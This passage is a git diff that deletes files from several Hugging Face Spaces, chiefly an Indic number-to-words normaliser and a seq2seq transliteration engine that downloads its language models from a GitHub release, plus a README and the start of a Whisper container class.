"ನೂರ"): - return "ನೂರು" - exception_dict = { - "ನೂರ": "ನೂರು", - "ಸಾವಿರದ": "ಸಾವಿರ", - "ಲಕ್ಷದ": "ಲಕ್ಷ", - "ಕೋಟಿಯ": "ಕೋಟಿ", - } - for expt in exception_dict: - if occurs_at_end(expt): - words = words.replace(expt, exception_dict[expt]) - return words - - -def num_to_word(num, lang, separator=", ", combiner=" "): - """ - Main Method - :param num: Number digits from any indian language - :param lang: Language Code from supported Language - :param separator: Separator character i.e. separator = '-' --> 'two hundred-sixty' - :param combiner: combine number with position i.e. combiner = '-' --> 'two-hundred sixty' - :return: UTF-8 String of numbers in words - """ - lang = lang.lower() - num = str(num) - - # Load dictionary according to language code - assert lang in supported_lang, "Language not supported" - num_dic = num_dict[lang] - - # dash default combiner for english-india - if (lang == "en") & (combiner == " "): - combiner = "-" - - # Remove punctuations from numbers - num = str(num).replace(",", "").replace(" ", "") - - # Replace native language numbers with english digits - for language in supported_lang: - for num_index in range(10): - num = num.replace(all_num[language][num_index], all_num["en"][num_index]) - - # Assert that input contains only integer number - for digit in num: - assert digit in all_num["en"], "Give proper input" - - # Process - # For Number longer than 9 digits - def all_two_digit(digits_2): - if len(digits_2) <= 1: # Provided only one/zero digit - return num_dic.get(digits_2, "") - elif digits_2 == "00": # Two Zero provided - return num_dic["0"] + separator + num_dic["0"] - elif digits_2[0] == "0": # First digit is zero - return num_dic["0"] + separator + num_dic[digits_2[1]] - else: # Both digit provided - return num_dic[digits_2] - - # For Number less than 9 digits - def two_digit(digits_2): - digits_2 = digits_2.lstrip("0") - if len(digits_2) != 0: - return num_dic[digits_2] - else: - return "" - - def all_digit(digits): - digits = digits.lstrip("0") - digit_len = len(digits) - if digit_len > 3: - num_of_digits_to_process = (digit_len % 2) + 1 - process_digits = digits[:num_of_digits_to_process] - base = str(10 ** (int(digit_len / 2) * 2 - 1)) - remain_digits = digits[num_of_digits_to_process:] - return ( - num_dic[process_digits] - + combiner - + num_dic[base] - + separator - + all_digit(remain_digits) - ) - elif len(digits) == 3: - return ( - num_dic[digits[:1]] - + combiner - + num_dic["100"] - + separator - + two_digit(digits[1:]) - ) - else: - return two_digit(digits) - - num = num.lstrip("0") - full_digit_len = len(num) - - if full_digit_len == 0: - output = num_dic["0"] - elif full_digit_len <= 9: - output = all_digit(num) - else: - iteration = round(full_digit_len / 2) - output = all_two_digit(num[:2]) # First to digit - for i in range(1, iteration): - output = ( - output + separator + all_two_digit(num[i * 2 : (i + 1) * 2]) - ) # Next two digit pairs - remaining_digits = num[iteration * 2 :] - if not all_two_digit(remaining_digits) == "": - output = ( - output + separator + all_two_digit(remaining_digits) - ) # remaining Last one/two digits - - output = output.strip(separator) - - output = language_specific_exception(output, lang, combiner) - - return output - - -# --------------------------------- num_to_word_on_a_sent --------------------------------- - - -def is_digit(word, digit_pattern): - return re.search(digit_pattern, word) - - -def remove_punct(sent): - clean = re.sub("[%s]" % re.escape(string.punctuation), " ", sent) - return " ".join([word for word in clean.split() if word]) - - -def normalize_nums(text, lang): - """ - text: str (eg) - lang: lang code ['en', 'hi'] - - returns: str - (eg) - """ - - if lang in supported_lang: - words = text.split() - lang_digits = [str(i) for i in range(0, 10)] - - digit_pattern = "[" + "".join(lang_digits) + "]" - num_indices = [ - ind for ind, word in enumerate(words) if is_digit(word, digit_pattern) - ] - - words_up = [ - num_to_word(word, lang, separator=" ", combiner=" ") - if ind in num_indices - else word - for ind, word in enumerate(words) - ] - return " ".join(words_up) - else: - return text - - -if __name__ == "__main__": - print(normalize_nums("रीटा के पास 16 बिल्लियाँ हैं।", "hi")) diff --git a/spaces/Harveenchadha/Vakyansh-Tamil-TTS/ttsv/tts_infer/transliterate.py b/spaces/Harveenchadha/Vakyansh-Tamil-TTS/ttsv/tts_infer/transliterate.py deleted file mode 100644 index 575430562683434cd44fd8d2e77d26dab9ced73b..0000000000000000000000000000000000000000 --- a/spaces/Harveenchadha/Vakyansh-Tamil-TTS/ttsv/tts_infer/transliterate.py +++ /dev/null @@ -1,919 +0,0 @@ -import torch -import torch.nn as nn -import numpy as np -import pandas as pd -import random -import sys -import os -import json -import enum -import traceback -import re - -F_DIR = os.path.dirname(os.environ.get('translit_model_base_path', os.path.realpath(__file__))) - - -class XlitError(enum.Enum): - lang_err = "Unsupported langauge ID requested ;( Please check available languages." - string_err = "String passed is incompatable ;(" - internal_err = "Internal crash ;(" - unknown_err = "Unknown Failure" - loading_err = "Loading failed ;( Check if metadata/paths are correctly configured." - - -##=================== Network ================================================== - - -class Encoder(nn.Module): - def __init__( - self, - input_dim, - embed_dim, - hidden_dim, - rnn_type="gru", - layers=1, - bidirectional=False, - dropout=0, - device="cpu", - ): - super(Encoder, self).__init__() - - self.input_dim = input_dim # src_vocab_sz - self.enc_embed_dim = embed_dim - self.enc_hidden_dim = hidden_dim - self.enc_rnn_type = rnn_type - self.enc_layers = layers - self.enc_directions = 2 if bidirectional else 1 - self.device = device - - self.embedding = nn.Embedding(self.input_dim, self.enc_embed_dim) - - if self.enc_rnn_type == "gru": - self.enc_rnn = nn.GRU( - input_size=self.enc_embed_dim, - hidden_size=self.enc_hidden_dim, - num_layers=self.enc_layers, - bidirectional=bidirectional, - ) - elif self.enc_rnn_type == "lstm": - self.enc_rnn = nn.LSTM( - input_size=self.enc_embed_dim, - hidden_size=self.enc_hidden_dim, - num_layers=self.enc_layers, - bidirectional=bidirectional, - ) - else: - raise Exception("XlitError: unknown RNN type mentioned") - - def forward(self, x, x_sz, hidden=None): - """ - x_sz: (batch_size, 1) - Unpadded sequence lengths used for pack_pad - """ - batch_sz = x.shape[0] - # x: batch_size, max_length, enc_embed_dim - x = self.embedding(x) - - ## pack the padded data - # x: max_length, batch_size, enc_embed_dim -> for pack_pad - x = x.permute(1, 0, 2) - x = nn.utils.rnn.pack_padded_sequence(x, x_sz, enforce_sorted=False) # unpad - - # output: packed_size, batch_size, enc_embed_dim - # hidden: n_layer**num_directions, batch_size, hidden_dim | if LSTM (h_n, c_n) - output, hidden = self.enc_rnn( - x - ) # gru returns hidden state of all timesteps as well as hidden state at last timestep - - ## pad the sequence to the max length in the batch - # output: max_length, batch_size, enc_emb_dim*directions) - output, _ = nn.utils.rnn.pad_packed_sequence(output) - - # output: batch_size, max_length, hidden_dim - output = output.permute(1, 0, 2) - - return output, hidden - - def get_word_embedding(self, x): - """ """ - x_sz = torch.tensor([len(x)]) - x_ = torch.tensor(x).unsqueeze(0).to(dtype=torch.long) - # x: 1, max_length, enc_embed_dim - x = self.embedding(x_) - - ## pack the padded data - # x: max_length, 1, enc_embed_dim -> for pack_pad - x = x.permute(1, 0, 2) - x = nn.utils.rnn.pack_padded_sequence(x, x_sz, enforce_sorted=False) # unpad - - # output: packed_size, 1, enc_embed_dim - # hidden: n_layer**num_directions, 1, hidden_dim | if LSTM (h_n, c_n) - output, hidden = self.enc_rnn( - x - ) # gru returns hidden state of all timesteps as well as hidden state at last timestep - - out_embed = hidden[0].squeeze() - - return out_embed - - -class Decoder(nn.Module): - def __init__( - self, - output_dim, - embed_dim, - hidden_dim, - rnn_type="gru", - layers=1, - use_attention=True, - enc_outstate_dim=None, # enc_directions * enc_hidden_dim - dropout=0, - device="cpu", - ): - super(Decoder, self).__init__() - - self.output_dim = output_dim # tgt_vocab_sz - self.dec_hidden_dim = hidden_dim - self.dec_embed_dim = embed_dim - self.dec_rnn_type = rnn_type - self.dec_layers = layers - self.use_attention = use_attention - self.device = device - if self.use_attention: - self.enc_outstate_dim = enc_outstate_dim if enc_outstate_dim else hidden_dim - else: - self.enc_outstate_dim = 0 - - self.embedding = nn.Embedding(self.output_dim, self.dec_embed_dim) - - if self.dec_rnn_type == "gru": - self.dec_rnn = nn.GRU( - input_size=self.dec_embed_dim - + self.enc_outstate_dim, # to concat attention_output - hidden_size=self.dec_hidden_dim, # previous Hidden - num_layers=self.dec_layers, - batch_first=True, - ) - elif self.dec_rnn_type == "lstm": - self.dec_rnn = nn.LSTM( - input_size=self.dec_embed_dim - + self.enc_outstate_dim, # to concat attention_output - hidden_size=self.dec_hidden_dim, # previous Hidden - num_layers=self.dec_layers, - batch_first=True, - ) - else: - raise Exception("XlitError: unknown RNN type mentioned") - - self.fc = nn.Sequential( - nn.Linear(self.dec_hidden_dim, self.dec_embed_dim), - nn.LeakyReLU(), - # nn.Linear(self.dec_embed_dim, self.dec_embed_dim), nn.LeakyReLU(), # removing to reduce size - nn.Linear(self.dec_embed_dim, self.output_dim), - ) - - ##----- Attention ---------- - if self.use_attention: - self.W1 = nn.Linear(self.enc_outstate_dim, self.dec_hidden_dim) - self.W2 = nn.Linear(self.dec_hidden_dim, self.dec_hidden_dim) - self.V = nn.Linear(self.dec_hidden_dim, 1) - - def attention(self, x, hidden, enc_output): - """ - x: (batch_size, 1, dec_embed_dim) -> after Embedding - enc_output: batch_size, max_length, enc_hidden_dim *num_directions - hidden: n_layers, batch_size, hidden_size | if LSTM (h_n, c_n) - """ - - ## perform addition to calculate the score - - # hidden_with_time_axis: batch_size, 1, hidden_dim - ## hidden_with_time_axis = hidden.permute(1, 0, 2) ## replaced with below 2lines - hidden_with_time_axis = ( - torch.sum(hidden, axis=0) - if self.dec_rnn_type != "lstm" - else torch.sum(hidden[0], axis=0) - ) # h_n - - hidden_with_time_axis = hidden_with_time_axis.unsqueeze(1) - - # score: batch_size, max_length, hidden_dim - score = torch.tanh(self.W1(enc_output) + self.W2(hidden_with_time_axis)) - - # attention_weights: batch_size, max_length, 1 - # we get 1 at the last axis because we are applying score to self.V - attention_weights = torch.softmax(self.V(score), dim=1) - - # context_vector shape after sum == (batch_size, hidden_dim) - context_vector = attention_weights * enc_output - context_vector = torch.sum(context_vector, dim=1) - # context_vector: batch_size, 1, hidden_dim - context_vector = context_vector.unsqueeze(1) - - # attend_out (batch_size, 1, dec_embed_dim + hidden_size) - attend_out = torch.cat((context_vector, x), -1) - - return attend_out, attention_weights - - def forward(self, x, hidden, enc_output): - """ - x: (batch_size, 1) - enc_output: batch_size, max_length, dec_embed_dim - hidden: n_layer, batch_size, hidden_size | lstm: (h_n, c_n) - """ - if (hidden is None) and (self.use_attention is False): - raise Exception( - "XlitError: No use of a decoder with No attention and No Hidden" - ) - - batch_sz = x.shape[0] - - if hidden is None: - # hidden: n_layers, batch_size, hidden_dim - hid_for_att = torch.zeros( - (self.dec_layers, batch_sz, self.dec_hidden_dim) - ).to(self.device) - elif self.dec_rnn_type == "lstm": - hid_for_att = hidden[1] # c_n - - # x (batch_size, 1, dec_embed_dim) -> after embedding - x = self.embedding(x) - - if self.use_attention: - # x (batch_size, 1, dec_embed_dim + hidden_size) -> after attention - # aw: (batch_size, max_length, 1) - x, aw = self.attention(x, hidden, enc_output) - else: - x, aw = x, 0 - - # passing the concatenated vector to the GRU - # output: (batch_size, n_layers, hidden_size) - # hidden: n_layers, batch_size, hidden_size | if LSTM (h_n, c_n) - output, hidden = ( - self.dec_rnn(x, hidden) if hidden is not None else self.dec_rnn(x) - ) - - # output :shp: (batch_size * 1, hidden_size) - output = output.view(-1, output.size(2)) - - # output :shp: (batch_size * 1, output_dim) - output = self.fc(output) - - return output, hidden, aw - - -class Seq2Seq(nn.Module): - """ - Class dependency: Encoder, Decoder - """ - - def __init__( - self, encoder, decoder, pass_enc2dec_hid=False, dropout=0, device="cpu" - ): - super(Seq2Seq, self).__init__() - - self.encoder = encoder - self.decoder = decoder - self.device = device - self.pass_enc2dec_hid = pass_enc2dec_hid - _force_en2dec_hid_conv = False - - if self.pass_enc2dec_hid: - assert ( - decoder.dec_hidden_dim == encoder.enc_hidden_dim - ), "Hidden Dimension of encoder and decoder must be same, or unset `pass_enc2dec_hid`" - if decoder.use_attention: - assert ( - decoder.enc_outstate_dim - == encoder.enc_directions * encoder.enc_hidden_dim - ), "Set `enc_out_dim` correctly in decoder" - assert ( - self.pass_enc2dec_hid or decoder.use_attention - ), "No use of a decoder with No attention and No Hidden from Encoder" - - self.use_conv_4_enc2dec_hid = False - if ( - self.pass_enc2dec_hid - and (encoder.enc_directions * encoder.enc_layers != decoder.dec_layers) - ) or _force_en2dec_hid_conv: - if encoder.enc_rnn_type == "lstm" or encoder.enc_rnn_type == "lstm": - raise Exception( - "XlitError: conv for enc2dec_hid not implemented; Change the layer numbers appropriately" - ) - - self.use_conv_4_enc2dec_hid = True - self.enc_hid_1ax = encoder.enc_directions * encoder.enc_layers - self.dec_hid_1ax = decoder.dec_layers - self.e2d_hidden_conv = nn.Conv1d(self.enc_hid_1ax, self.dec_hid_1ax, 1) - - def enc2dec_hidden(self, enc_hidden): - """ - enc_hidden: n_layer, batch_size, hidden_dim*num_directions - TODO: Implement the logic for LSTm bsed model - """ - # hidden: batch_size, enc_layer*num_directions, enc_hidden_dim - hidden = enc_hidden.permute(1, 0, 2).contiguous() - # hidden: batch_size, dec_layers, dec_hidden_dim -> [N,C,Tstep] - hidden = self.e2d_hidden_conv(hidden) - - # hidden: dec_layers, batch_size , dec_hidden_dim - hidden_for_dec = hidden.permute(1, 0, 2).contiguous() - - return hidden_for_dec - - def active_beam_inference(self, src, beam_width=3, max_tgt_sz=50): - """Search based decoding - src: (sequence_len) - """ - - def _avg_score(p_tup): - """Used for Sorting - TODO: Dividing by length of sequence power alpha as hyperparam - """ - return p_tup[0] - - import sys - - batch_size = 1 - start_tok = src[0] - end_tok = src[-1] - src_sz = torch.tensor([len(src)]) - src_ = src.unsqueeze(0) - - # enc_output: (batch_size, padded_seq_length, enc_hidden_dim*num_direction) - # enc_hidden: (enc_layers*num_direction, batch_size, hidden_dim) - enc_output, enc_hidden = self.encoder(src_, src_sz) - - if self.pass_enc2dec_hid: - # dec_hidden: dec_layers, batch_size , dec_hidden_dim - if self.use_conv_4_enc2dec_hid: - init_dec_hidden = self.enc2dec_hidden(enc_hidden) - else: - init_dec_hidden = enc_hidden - else: - # dec_hidden -> Will be initialized to zeros internally - init_dec_hidden = None - - # top_pred[][0] = Σ-log_softmax - # top_pred[][1] = sequence torch.tensor shape: (1) - # top_pred[][2] = dec_hidden - top_pred_list = [(0, start_tok.unsqueeze(0), init_dec_hidden)] - - for t in range(max_tgt_sz): - cur_pred_list = [] - - for p_tup in top_pred_list: - if p_tup[1][-1] == end_tok: - cur_pred_list.append(p_tup) - continue - - # dec_hidden: dec_layers, 1, hidden_dim - # dec_output: 1, output_dim - dec_output, dec_hidden, _ = self.decoder( - x=p_tup[1][-1].view(1, 1), # dec_input: (1,1) - hidden=p_tup[2], - enc_output=enc_output, - ) - - ## π{prob} = Σ{log(prob)} -> to prevent diminishing - # dec_output: (1, output_dim) - dec_output = nn.functional.log_softmax(dec_output, dim=1) - # pred_topk.values & pred_topk.indices: (1, beam_width) - pred_topk = torch.topk(dec_output, k=beam_width, dim=1) - - for i in range(beam_width): - sig_logsmx_ = p_tup[0] + pred_topk.values[0][i] - # seq_tensor_ : (seq_len) - seq_tensor_ = torch.cat((p_tup[1], pred_topk.indices[0][i].view(1))) - - cur_pred_list.append((sig_logsmx_, seq_tensor_, dec_hidden)) - - cur_pred_list.sort(key=_avg_score, reverse=True) # Maximized order - top_pred_list = cur_pred_list[:beam_width] - - # check if end_tok of all topk - end_flags_ = [1 if t[1][-1] == end_tok else 0 for t in top_pred_list] - if beam_width == sum(end_flags_): - break - - pred_tnsr_list = [t[1] for t in top_pred_list] - - return pred_tnsr_list - - -##===================== Glyph handlers ======================================= - - -class GlyphStrawboss: - def __init__(self, glyphs="en"): - """list of letters in a language in unicode - lang: ISO Language code - glyphs: json file with script information - """ - if glyphs == "en": - # Smallcase alone - self.glyphs = [chr(alpha) for alpha in range(97, 122 + 1)] - else: - self.dossier = json.load(open(glyphs, encoding="utf-8")) - self.glyphs = self.dossier["glyphs"] - self.numsym_map = self.dossier["numsym_map"] - - self.char2idx = {} - self.idx2char = {} - self._create_index() - - def _create_index(self): - - self.char2idx["_"] = 0 # pad - self.char2idx["$"] = 1 # start - self.char2idx["#"] = 2 # end - self.char2idx["*"] = 3 # Mask - self.char2idx["'"] = 4 # apostrophe U+0027 - self.char2idx["%"] = 5 # unused - self.char2idx["!"] = 6 # unused - - # letter to index mapping - for idx, char in enumerate(self.glyphs): - self.char2idx[char] = idx + 7 # +7 token initially - - # index to letter mapping - for char, idx in self.char2idx.items(): - self.idx2char[idx] = char - - def size(self): - return len(self.char2idx) - - def word2xlitvec(self, word): - """Converts given string of gyphs(word) to vector(numpy) - Also adds tokens for start and end - """ - try: - vec = [self.char2idx["$"]] # start token - for i in list(word): - vec.append(self.char2idx[i]) - vec.append(self.char2idx["#"]) # end token - - vec = np.asarray(vec, dtype=np.int64) - return vec - - except Exception as error: - print("XlitError: In word:", word, "Error Char not in Token:", error) - sys.exit() - - def xlitvec2word(self, vector): - """Converts vector(numpy) to string of glyphs(word)""" - char_list = [] - for i in vector: - char_list.append(self.idx2char[i]) - - word = "".join(char_list).replace("$", "").replace("#", "") # remove tokens - word = word.replace("_", "").replace("*", "") # remove tokens - return word - - -class VocabSanitizer: - def __init__(self, data_file): - """ - data_file: path to file conatining vocabulary list - """ - extension = os.path.splitext(data_file)[-1] - if extension == ".json": - self.vocab_set = set(json.load(open(data_file, encoding="utf-8"))) - elif extension == ".csv": - self.vocab_df = pd.read_csv(data_file).set_index("WORD") - self.vocab_set = set(self.vocab_df.index) - else: - print("XlitError: Only Json/CSV file extension supported") - - def reposition(self, word_list): - """Reorder Words in list""" - new_list = [] - temp_ = word_list.copy() - for v in word_list: - if v in self.vocab_set: - new_list.append(v) - temp_.remove(v) - new_list.extend(temp_) - - return new_list - - -##=============== INSTANTIATION ================================================ - - -class XlitPiston: - """ - For handling prediction & post-processing of transliteration for a single language - Class dependency: Seq2Seq, GlyphStrawboss, VocabSanitizer - Global Variables: F_DIR - """ - - def __init__( - self, - weight_path, - vocab_file, - tglyph_cfg_file, - iglyph_cfg_file="en", - device="cpu", - ): - - self.device = device - self.in_glyph_obj = GlyphStrawboss(iglyph_cfg_file) - self.tgt_glyph_obj = GlyphStrawboss(glyphs=tglyph_cfg_file) - self.voc_sanity = VocabSanitizer(vocab_file) - - self._numsym_set = set( - json.load(open(tglyph_cfg_file, encoding="utf-8"))["numsym_map"].keys() - ) - self._inchar_set = set("abcdefghijklmnopqrstuvwxyz") - self._natscr_set = set().union( - self.tgt_glyph_obj.glyphs, sum(self.tgt_glyph_obj.numsym_map.values(), []) - ) - - ## Model Config Static TODO: add defining in json support - input_dim = self.in_glyph_obj.size() - output_dim = self.tgt_glyph_obj.size() - enc_emb_dim = 300 - dec_emb_dim = 300 - enc_hidden_dim = 512 - dec_hidden_dim = 512 - rnn_type = "lstm" - enc2dec_hid = True - attention = True - enc_layers = 1 - dec_layers = 2 - m_dropout = 0 - enc_bidirect = True - enc_outstate_dim = enc_hidden_dim * (2 if enc_bidirect else 1) - - enc = Encoder( - input_dim=input_dim, - embed_dim=enc_emb_dim, - hidden_dim=enc_hidden_dim, - rnn_type=rnn_type, - layers=enc_layers, - dropout=m_dropout, - device=self.device, - bidirectional=enc_bidirect, - ) - dec = Decoder( - output_dim=output_dim, - embed_dim=dec_emb_dim, - hidden_dim=dec_hidden_dim, - rnn_type=rnn_type, - layers=dec_layers, - dropout=m_dropout, - use_attention=attention, - enc_outstate_dim=enc_outstate_dim, - device=self.device, - ) - self.model = Seq2Seq(enc, dec, pass_enc2dec_hid=enc2dec_hid, device=self.device) - self.model = self.model.to(self.device) - weights = torch.load(weight_path, map_location=torch.device(self.device)) - - self.model.load_state_dict(weights) - self.model.eval() - - def character_model(self, word, beam_width=1): - in_vec = torch.from_numpy(self.in_glyph_obj.word2xlitvec(word)).to(self.device) - ## change to active or passive beam - p_out_list = self.model.active_beam_inference(in_vec, beam_width=beam_width) - p_result = [ - self.tgt_glyph_obj.xlitvec2word(out.cpu().numpy()) for out in p_out_list - ] - - result = self.voc_sanity.reposition(p_result) - - # List type - return result - - def numsym_model(self, seg): - """tgt_glyph_obj.numsym_map[x] returns a list object""" - if len(seg) == 1: - return [seg] + self.tgt_glyph_obj.numsym_map[seg] - - a = [self.tgt_glyph_obj.numsym_map[n][0] for n in seg] - return [seg] + ["".join(a)] - - def _word_segementer(self, sequence): - - sequence = sequence.lower() - accepted = set().union(self._numsym_set, self._inchar_set, self._natscr_set) - # sequence = ''.join([i for i in sequence if i in accepted]) - - segment = [] - idx = 0 - seq_ = list(sequence) - while len(seq_): - # for Number-Symbol - temp = "" - while len(seq_) and seq_[0] in self._numsym_set: - temp += seq_[0] - seq_.pop(0) - if temp != "": - segment.append(temp) - - # for Target Chars - temp = "" - while len(seq_) and seq_[0] in self._natscr_set: - temp += seq_[0] - seq_.pop(0) - if temp != "": - segment.append(temp) - - # for Input-Roman Chars - temp = "" - while len(seq_) and seq_[0] in self._inchar_set: - temp += seq_[0] - seq_.pop(0) - if temp != "": - segment.append(temp) - - temp = "" - while len(seq_) and seq_[0] not in accepted: - temp += seq_[0] - seq_.pop(0) - if temp != "": - segment.append(temp) - - return segment - - def inferencer(self, sequence, beam_width=10): - - seg = self._word_segementer(sequence[:120]) - lit_seg = [] - - p = 0 - while p < len(seg): - if seg[p][0] in self._natscr_set: - lit_seg.append([seg[p]]) - p += 1 - - elif seg[p][0] in self._inchar_set: - lit_seg.append(self.character_model(seg[p], beam_width=beam_width)) - p += 1 - - elif seg[p][0] in self._numsym_set: # num & punc - lit_seg.append(self.numsym_model(seg[p])) - p += 1 - else: - lit_seg.append([seg[p]]) - p += 1 - - ## IF segment less/equal to 2 then return combinotorial, - ## ELSE only return top1 of each result concatenated - if len(lit_seg) == 1: - final_result = lit_seg[0] - - elif len(lit_seg) == 2: - final_result = [""] - for seg in lit_seg: - new_result = [] - for s in seg: - for f in final_result: - new_result.append(f + s) - final_result = new_result - - else: - new_result = [] - for seg in lit_seg: - new_result.append(seg[0]) - final_result = ["".join(new_result)] - - return final_result - - -from collections.abc import Iterable -from pydload import dload -import zipfile - -MODEL_DOWNLOAD_URL_PREFIX = "https://github.com/AI4Bharat/IndianNLP-Transliteration/releases/download/xlit_v0.5.0/" - - -def is_folder_writable(folder): - try: - os.makedirs(folder, exist_ok=True) - tmp_file = os.path.join(folder, ".write_test") - with open(tmp_file, "w") as f: - f.write("Permission Check") - os.remove(tmp_file) - return True - except: - return False - - -def is_directory_writable(path): - if os.name == "nt": - return is_folder_writable(path) - return os.access(path, os.W_OK | os.X_OK) - - -class XlitEngine: - """ - For Managing the top level tasks and applications of transliteration - Global Variables: F_DIR - """ - - def __init__( - self, lang2use="all", config_path="translit_models/default_lineup.json" - ): - - lineup = json.load(open(os.path.join(F_DIR, config_path), encoding="utf-8")) - self.lang_config = {} - if isinstance(lang2use, str): - if lang2use == "all": - self.lang_config = lineup - elif lang2use in lineup: - self.lang_config[lang2use] = lineup[lang2use] - else: - raise Exception( - "XlitError: The entered Langauge code not found. Available are {}".format( - lineup.keys() - ) - ) - - elif isinstance(lang2use, Iterable): - for l in lang2use: - try: - self.lang_config[l] = lineup[l] - except: - print( - "XlitError: Language code {} not found, Skipping...".format(l) - ) - else: - raise Exception( - "XlitError: lang2use must be a list of language codes (or) string of single language code" - ) - - if is_directory_writable(F_DIR): - models_path = os.path.join(F_DIR, "translit_models") - else: - user_home = os.path.expanduser("~") - models_path = os.path.join(user_home, ".AI4Bharat_Xlit_Models") - os.makedirs(models_path, exist_ok=True) - self.download_models(models_path) - - self.langs = {} - self.lang_model = {} - for la in self.lang_config: - try: - print("Loading {}...".format(la)) - self.lang_model[la] = XlitPiston( - weight_path=os.path.join( - models_path, self.lang_config[la]["weight"] - ), - vocab_file=os.path.join(models_path, self.lang_config[la]["vocab"]), - tglyph_cfg_file=os.path.join( - models_path, self.lang_config[la]["script"] - ), - iglyph_cfg_file="en", - ) - self.langs[la] = self.lang_config[la]["name"] - except Exception as error: - print("XlitError: Failure in loading {} \n".format(la), error) - print(XlitError.loading_err.value) - - def download_models(self, models_path): - """ - Download models from GitHub Releases if not exists - """ - for l in self.lang_config: - lang_name = self.lang_config[l]["eng_name"] - lang_model_path = os.path.join(models_path, lang_name) - if not os.path.isdir(lang_model_path): - print("Downloading model for language: %s" % lang_name) - remote_url = MODEL_DOWNLOAD_URL_PREFIX + lang_name + ".zip" - downloaded_zip_path = os.path.join(models_path, lang_name + ".zip") - dload(url=remote_url, save_to_path=downloaded_zip_path, max_time=None) - - if not os.path.isfile(downloaded_zip_path): - exit( - f"ERROR: Unable to download model from {remote_url} into {models_path}" - ) - - with zipfile.ZipFile(downloaded_zip_path, "r") as zip_ref: - zip_ref.extractall(models_path) - - if os.path.isdir(lang_model_path): - os.remove(downloaded_zip_path) - else: - exit( - f"ERROR: Unable to find models in {lang_model_path} after download" - ) - return - - def translit_word(self, eng_word, lang_code="default", topk=7, beam_width=10): - if eng_word == "": - return [] - - if lang_code in self.langs: - try: - res_list = self.lang_model[lang_code].inferencer( - eng_word, beam_width=beam_width - ) - return res_list[:topk] - - except Exception as error: - print("XlitError:", traceback.format_exc()) - print(XlitError.internal_err.value) - return XlitError.internal_err - - elif lang_code == "default": - try: - res_dict = {} - for la in self.lang_model: - res = self.lang_model[la].inferencer( - eng_word, beam_width=beam_width - ) - res_dict[la] = res[:topk] - return res_dict - - except Exception as error: - print("XlitError:", traceback.format_exc()) - print(XlitError.internal_err.value) - return XlitError.internal_err - - else: - print("XlitError: Unknown Langauge requested", lang_code) - print(XlitError.lang_err.value) - return XlitError.lang_err - - def translit_sentence(self, eng_sentence, lang_code="default", beam_width=10): - if eng_sentence == "": - return [] - - if lang_code in self.langs: - try: - out_str = "" - for word in eng_sentence.split(): - res_ = self.lang_model[lang_code].inferencer( - word, beam_width=beam_width - ) - out_str = out_str + res_[0] + " " - return out_str[:-1] - - except Exception as error: - print("XlitError:", traceback.format_exc()) - print(XlitError.internal_err.value) - return XlitError.internal_err - - elif lang_code == "default": - try: - res_dict = {} - for la in self.lang_model: - out_str = "" - for word in eng_sentence.split(): - res_ = self.lang_model[la].inferencer( - word, beam_width=beam_width - ) - out_str = out_str + res_[0] + " " - res_dict[la] = out_str[:-1] - return res_dict - - except Exception as error: - print("XlitError:", traceback.format_exc()) - print(XlitError.internal_err.value) - return XlitError.internal_err - - else: - print("XlitError: Unknown Langauge requested", lang_code) - print(XlitError.lang_err.value) - return XlitError.lang_err - - -if __name__ == "__main__": - - available_lang = [ - "bn", - "gu", - "hi", - "kn", - "gom", - "mai", - "ml", - "mr", - "pa", - "sd", - "si", - "ta", - "te", - "ur", - ] - - reg = re.compile(r"[a-zA-Z]") - lang = "hi" - engine = XlitEngine( - lang - ) # if you don't specify lang code here, this will give results in all langs available - sent = "Hello World! ABCD क्या हाल है आपका?" - words = [ - engine.translit_word(word, topk=1)[lang][0] if reg.match(word) else word - for word in sent.split() - ] # only transliterated en words, leaves rest as it is - updated_sent = " ".join(words) - - print(updated_sent) - - # output : हेलो वर्ल्ड! क्या हाल है आपका? - - # y = engine.translit_sentence("Hello World !")['hi'] - # print(y) diff --git a/spaces/Harveenchadha/en_to_indic_translation/indic_nlp_library/indicnlp/normalize/__init__.py b/spaces/Harveenchadha/en_to_indic_translation/indic_nlp_library/indicnlp/normalize/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/Hasan777/IlluminatiAI-Illuminati_Diffusion_v1.0/README.md b/spaces/Hasan777/IlluminatiAI-Illuminati_Diffusion_v1.0/README.md deleted file mode 100644 index 16118f711e72d59b6012922f8f87d106ec7e4443..0000000000000000000000000000000000000000 --- a/spaces/Hasan777/IlluminatiAI-Illuminati_Diffusion_v1.0/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: IlluminatiAI-Illuminati Diffusion V1.0 -emoji: 💩 -colorFrom: gray -colorTo: green -sdk: gradio -sdk_version: 3.19.1 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/HgMenon/Transcribe_V0.2/src/whisper/abstractWhisperContainer.py b/spaces/HgMenon/Transcribe_V0.2/src/whisper/abstractWhisperContainer.py deleted file mode 100644 index d14fb23d24256e3f1c12d8ae1db6ece891d49ec8..0000000000000000000000000000000000000000 --- a/spaces/HgMenon/Transcribe_V0.2/src/whisper/abstractWhisperContainer.py +++ /dev/null @@ -1,122 +0,0 @@ -import abc -from typing import List -from src.config import ModelConfig, VadInitialPromptMode - -from src.hooks.progressListener import ProgressListener -from src.modelCache import GLOBAL_MODEL_CACHE, ModelCache - -class AbstractWhisperCallback: - @abc.abstractmethod - def invoke(self, audio, segment_index: int, prompt: str, detected_language: str, progress_listener: ProgressListener = None): - """ - Peform the transcription of the given audio file or data. - - Parameters - ---------- - audio: Union[str, np.ndarray, torch.Tensor] - The audio file to transcribe, or the audio data as a numpy array or torch tensor. - segment_index: int - The target language of the transcription. If not specified, the language will be inferred from the audio content. - task: str - The task - either translate or transcribe. - progress_listener: ProgressListener - A callback to receive progress updates. - """ - raise NotImplementedError() - - def _get_initial_prompt(self, initial_prompt: str, initial_prompt_mode: VadInitialPromptMode, - prompt: str, segment_index: int): - if (initial_prompt_mode == VadInitialPromptMode.PREPEND_ALL_SEGMENTS): - return self._concat_prompt(initial_prompt, prompt) - elif (initial_prompt_mode == VadInitialPromptMode.PREPREND_FIRST_SEGMENT): - return self._concat_prompt(initial_prompt, prompt) if segment_index == 0 else prompt - else: - raise ValueError(f"Unknown initial prompt mode {initial_prompt_mode}") - - def _concat_prompt(self, prompt1, prompt2): - if (prompt1 is None): - return prompt2 - elif (prompt2 is None): - return prompt1 - else: - return prompt1 + " " + prompt2 - -class AbstractWhisperContainer: - def __init__(self, model_name: str, device: str = None, compute_type: str = 